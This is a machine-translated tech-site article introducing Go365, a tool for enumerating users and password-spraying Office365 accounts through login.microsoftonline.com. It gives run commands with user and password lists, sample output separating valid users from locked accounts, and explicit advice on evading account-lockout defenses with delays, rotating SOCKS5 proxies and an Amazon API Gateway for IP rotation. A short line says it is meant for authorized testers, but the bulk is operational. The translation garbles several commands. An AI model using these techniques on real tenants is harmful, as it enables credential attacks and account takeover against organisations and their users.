Shulou(Shulou.com)06/03 Report--

This article introduces the knowledge of "how to use Go365 to infiltrate Office365 users". In the operation of actual cases, many people will encounter such a dilemma, so let the editor lead you to learn how to deal with these situations. I hope you can read it carefully and be able to achieve something!

Words written in the front

Go365 is a tool designed to help researchers perform user enumeration and password burst attacks against organizations and users who use Office365 (now / soon). Go365 uses the only SOAP API node on login.microsoftonline.com, while login.microsoftonline.com is something that many other tools would not choose to use. When asked for an email address and password, the terminal node responds to an Azure AD authentication and authorization code, which is then handed over to Go365 for processing, and the results are printed to the screen or output to a file.

User enumeration and password burst attacks are performed at the same time, but Go365 does not provide specific parameters or functions to allow researchers to perform user enumeration attacks only. Each time Go365 performs a password burst attack, it parses whether the user's identity is valid.

Matters needing attention

This tool may not apply to all domains that use Office365. Tests show that it is suitable for most federated domains. Even if a valid password is provided, some domains only report valid users, but the experimental results may vary in different scenarios.

Tests of the tool on different domains show that the tool does not lock the target account after multiple password burst failures, but the experimental results may be different in different scenarios.

This tool is designed to be used by security professionals authorized to "infiltrate" Office365 instances of the target organization.

Tool use

The tool uses a sample. / Go365-ul. / user_list.txt-p 'passwordbrothers 123'-d pwnthisfakedomain.com./Go365-ul. / user_list.txt-p' passwordbrothers 123'-d pwnthisfakedomain.com-w 5./Go365-up. / userpass_list.txt-d pwnthisfakedomain.com-w 5-o Go365output.txt./Go365-u legituser@pwnthisfakedomain.com-p 'passwordbrothers 123'-w 5-o Go365output.txt-proxy 127.0.0.1: 1080./Go365-u legituser-pl. / pass_list.txt-delay 1800-d pwnthisfakedomain.com-w 5-o Go365output.txt-proxyfile. / proxyfile.txt./Go365-ul. / user_list.txt-p 'password password 123'-d pwnthisfakedomain.com-w 5-o Go365output.txt-url https://k62g98dne3.execute-api.us-east-2.amazonaws.com/login account lockout (domain defense policy)

Warm reminder: you may not really lock the target account.

After multiple queries against the target domain, the tool may begin to report that the target account is locked.

Once the domain defense policy is triggered, the results of user enumerations are less reliable because requests for valid and invalid users randomly report that their accounts are locked.

... [-] User not found: test.user90@pwnthisfakedomain.com [-] User not found: test.user91@pwnthisfakedomain.com [-] Valid user, but invalid password: test.user92@pwnthisfakedomain.com [!] Account Locked Out: real.user1@pwnthisfakedomain.com [-] Valid user, but invalid password: test.user93@pwnthisfakedomain.com [!] Account Locked Out: valid.user94@pwnthisfakedomain.com [!] Account Locked Out: jane.smith@pwnthisfakedomain.com [-] Valid user, but invalid password: real.user95@pwnthisfakedomain.com [-] Valid user, but invalid password: fake.user96@pwnthisfakedomain.com [!] Account Locked Out: valid.smith@pwnthisfakedomain.com...

This is a defense mechanism, which will be triggered if the number of valid user queries for the target domain reaches the threshold within a certain period of time. Because the target organization can customize this threshold, the number of attempts and time period will vary from target domain to target domain.

Response strategy waiting delay

This defense mechanism is implemented based on time and IP addresses, while Go365 provides options to include wait time between requests and proxy options to distribute the request source. To circumvent the defense mechanism on the target domain, use a long wait time and multiple proxy servers.

It is recommended to wait at least 15 seconds:

-w 15Socks5 agent

If you still receive an "account locked" response, you need to set up a proxy to send the request. The agent option is currently only tested on the SSh SOCKS5 dynamic agent (ssh-D user@proxyserver).

You can create a SOCKS5 agent on platforms such as DO, AWS, or Vultr, and then create a file that contains data in the following format:

127.0.0.1:8081127.0.0.1:8082127.0.0.1:8083127.0.0.1:8084127.0.0.1:8085127.0.0.1:8086...

The tool randomly iterates over the provided proxy server and waits for a specified time delay between requests.

-w 15-proxyfile. / proxies.txt Amazon API Gateway

In addition, we can specify the node URL so that this tool can interact with the Amazon API gateway. At this point, we need to set the gateway to point to the https://login.microsoftonline.com/rst2.srf node, and then set the-url parameter to point to the URL address of the call. It is important to note that our IP address should be rotated after each request:

This is the end of the introduction to how url https://k62g98dne3.execute-api.us-east-2.amazonaws.com/login" uses Go365 to infiltrate Office365 users. Thank you for reading. If you want to know more about the industry, you can follow the website, the editor will output more high-quality practical articles for you!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.